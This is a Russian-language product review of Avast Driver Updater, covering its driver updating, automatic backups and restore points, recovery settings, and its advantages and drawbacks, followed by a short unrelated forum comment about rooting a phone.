Настройка периодического сканирования в Avast Driver Updater ОбновлениеAvast Driver Updater использует собственную облачную технологию для обновления нескольких драйверов одновременно без потери скорости. Разработчик сотрудничает более чем со 100 крупнейшими производителями оборудования для поддержания базы в актуальном состоянии, скачивание производится с сайтов официальных источников.Перед началом установки программа автоматически создает резервные копии обновляемых драйверов и точку восстановления операционной системы (рис. 5). Рисунок 5. Автоматическое создание резервных копий перед началом обновления в Avast Driver Updater  Скорость обновления драйвера зависит от объема скачиваемых файлов — в нашем случае это заняло меньше минуты (рис. 6). Рисунок 6. Установка драйверов в Avast Driver Updater  Чтобы снизить риск конфликтов оборудования, драйверы устанавливаются поочередно. При установке нескольких обновлений сразу может потребоваться несколько раз перезагрузить компьютер. После каждой перезагрузки программа Avast Driver Updater будет запускаться и отображать оставшиеся обновления.Безопасность использования системыЕсть мнение, что использование автоматических систем обновления может привести к сбоям в стабильности системы, однако производитель Avast Driver Updater проработал и эти риски. Перед установкой новых драйверов Avast Driver Updater создает резервные копии обновляемых драйверов, а также точку восстановления операционной системы. Эти действия позволяют сделать возврат к предыдущей стабильно работающей версии, если что-то пойдет не так.Создание резервных копий и восстановление драйверовВ разделе Резервное копирование можно управлять резервными копиями установленных драйверов — настроить расположение по умолчанию, перенести копии в другое место или создать новые (рис. 7). Рисунок 7. Просмотр резервных копий драйверов в Avast Driver Updater  Такая функция дает определенные преимущества перед установкой обновлений вручную — повышает уровень безопасности процесса обновления, если пользователь не делает копии самостоятельно. Для бдительных пользователей, регулярно создающих точки восстановления, эта функция поможет избежать риска забыть сделать копии.Если необходимо восстановить ранее обновленные драйверы, можно загрузить их в соответствующем пункте меню. Кроме того, программу можно использовать для восстановления копии операционной системы из заранее сохраненной точки (рис. 8). Рисунок 8. Интерфейс восстановления версий драйверов и операционной системы в Avast Driver Updater  Выбрать расположение, куда сохранять и откуда будут автоматически восстанавливаться резервные копии, можно в разделе Параметры (рис. 9). Здесь же можно настроить, будет ли выполняться перезагрузка компьютера после восстановления из резервной копии. Рисунок 9. Настройка параметров резервного копирования в Avast Driver Updater  ВыводыПроверить актуальность драйверов можно и штатными средствами через панель управления Windows. Но поскольку это не очень удобно, регулярное обновление и поддержка драйверов устройств в актуальном состоянии часто становится непростой задачей и требует много времени, особенно для людей, которые не знакомы с тонкостями работы компьютера и операционной системы. Кроме того, источником обновлений в этом случае выступает Microsoft, а не производители оборудования, поэтому версия драйвера не всегда может быть актуальной.Тем не менее, регулярное обновление драйверов улучшает производительность компьютера — многие сбои и ошибки системы вызваны проблемами с устаревшими драйверами.Avast Driver Updater успешно справляется со своей главной задачей — сделать регулярные обновления драйверов простыми для пользователя. Программа проверит текущие установленные версии драйверов всех распространенных устройств и элементов системы. Наиболее эффективным решением будет настроить регулярную проверку обновлений, совпадающую с работой Центра обновления Windows — многие производители выпускают новые драйверы сразу после выходов новых пакетов обновлений операционной системы.Для сканирования в режиме реального времени используется динамическая онлайн-база драйверов с сайтов производителей. Avast Driver Updater покажет, какие обновления доступны, и, в платной версии, поможет их установить. Это гораздо удобнее, чем ручная проверка каждого драйвера устройств штатными средствами операционной системы.Преимущества: Большая база данных драйверов от различных производителей.Высокая скорость сканирования.Обновление всех устаревших драйверов одним нажатием.Поддержка всех популярных версий Windows XP/Vista/7/8/10.Автоматическое создание резервных копий драйверов и операционной системы для восстановления в случае возникновения проблем совместимости.Скачивание драйверов с официальных сайтов производителей оборудования.Недостатки:Необходимость несколько раз перегружать компьютер в процессе установки пакета драйверов вместо единой перезагрузки после всех обновлений.Ручное управление диалоговыми окнами установщиков драйверов.Нет информации о дате выпуска обновляемого драйвера.Достаточно высокая стоимость приложения.Тестовая версия не позволяет обновить драйверы. Читать далее
    • nsk-sergey
      Есть вариант установить рут-права и сделать то, что нужно с телефоном. Но может случиться так, что пере прошивки не избежать. 
×